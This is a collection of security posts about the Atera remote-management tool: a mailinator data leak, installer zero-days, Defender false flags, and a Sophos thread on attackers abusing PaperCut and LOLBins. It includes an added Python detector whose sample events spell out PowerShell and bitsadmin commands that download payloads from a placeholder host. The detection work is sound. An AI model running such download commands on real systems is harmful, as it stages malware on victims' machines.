I noticed a (minor but abusable) data leak in the RMM/PSA tool Atera a while ago, reported it and it's now fixed. I think it's somewhat interesting so I wrote it up.

https://fyr.io/post/atera-leaked-their-customers-to-mailinator

Tldr: if you tested your SMTP settings, it used a public mailbox on mailinator, allowing anyone to watch for (and respond to, if you're so inclined) mail. Phishing opportunity!

#infosec #atera #privacy #dataleak #mailinator #writeup #phishing #netsec

Scraps

Scrappy notes on cool and interesting stuff I've seen online from the last little while

@acrypthash How you liking #ninjaone? We just moved from #connectwise automate to #atera and never been happier.

"⚠️ Critical Zero-Days in Atera Windows Installers Expose Users to Privilege Escalation Attacks ⚠️"

Zero-day vulnerabilities in Windows Installers for the Atera software could lead to privilege escalation attacks. Patch now!

Source: [The Hacker News](https://thehackernews.com/2023/07/critical-zero-days-in-atera-windows.html)

Tags: #Atera #Windows #ZeroDay #PrivilegeEscalation #CyberSecurity


The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

The tools exploited in the attacks have included what we refer to as "dual-use agents," used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

4/6

Post-exploitation activity targeting #PaperCut often results in #PowerShell commands being executed by the pc-app.exe parent process. We've collected logs of the affected system downloading #Atera remote monitoring software to the victim. (Atera is, of course, legitimate software, being abused by the attackers in this situation.)

Different threat groups are abusing PowerShell in different ways. One group calls PowerShell commands directly, as shown here. This particular attacker delivered a ransomware binary that was hosted on the ephemeral file host #tmpfiles (files hosted there are deleted from the server after 60 minutes):

3/6
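The three behaviours the Sophos thread above describes (pc-app.exe spawning PowerShell, bitsadmin.exe pulling a payload from a URL, and a PowerShell command line that reaches out to a remote host) map cleanly onto process-creation telemetry. The following is an added example, written for this page and not code from Sophos or from the thread: a small Python detector that applies those three checks to Sysmon Event ID 1 style fields. The events, file paths, and 203.0.113.x addresses are constructed for illustration; the PaperCut install path in particular is an assumption, and only the executable basename is used for matching.

```python
"""Flag the PaperCut post-exploitation patterns from the thread above
in process-creation events (Sysmon Event ID 1 style fields).
Added example; not Sophos detection logic."""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # ParentImage: full path of the parent process
    image: str          # Image: full path of the new process
    command_line: str   # CommandLine of the new process


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# bitsadmin switches that queue a download
BITS_DOWNLOAD_RE = re.compile(r"/(transfer|addfile)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Case-insensitive executable name, so install location does not matter."""
    return PureWindowsPath(path).name.lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the rule names that fire for one event (empty list = clean)."""
    parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    hits: list[str] = []
    # 1. The PaperCut application server should not be launching shells.
    if parent == "pc-app.exe" and child in SHELLS:
        hits.append("papercut-spawned-shell")
    # 2. bitsadmin.exe used as a LOLBin to fetch a payload over HTTP(S).
    if child == "bitsadmin.exe" and BITS_DOWNLOAD_RE.search(cmd) and URL_RE.search(cmd):
        hits.append("bitsadmin-download")
    # 3. PowerShell command line carrying a remote URL (download cradle).
    if child in POWERSHELL and URL_RE.search(cmd):
        hits.append("powershell-remote-url")
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> rules fired, for events that fired at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := detect(ev))}


# Constructed sample events (paths and addresses are assumptions, not captured data).
PC_APP = r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe"
SAMPLE_EVENTS = [
    ProcEvent(PC_APP,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -nop -w hidden -c "iwr http://203.0.113.10/agent.exe '
              '-OutFile C:\\Windows\\Temp\\agent.exe"'),
    ProcEvent(PC_APP,
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\bitsadmin.exe",
              "bitsadmin /transfer job /download /priority high "
              "http://203.0.113.10/agent.msi C:\\Users\\Public\\agent.msi"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),   # benign: no URL, normal parent
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {', '.join(rules)} <- {basename(ev.parent_image)} -> {basename(ev.image)}")
```

Rule 1 is the highest-signal of the three: a print-server application has no business launching a shell, so it tolerates very little tuning. Rules 2 and 3 will fire on legitimate admin activity in some environments and are better treated as enrichment that raises the severity of rule 1, or correlated with the download host's reputation, than as stand-alone alerts.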

Thank you for contacting #Atera #support. We are currently experiencing issues with Windows #Defender #flagging the Atera agents as #malicious.
This is to let you know that we are currently investigating and trying to find a solution for this issue.
Well #atera got #flagged globally by #defender and it's going to be a long fucking day.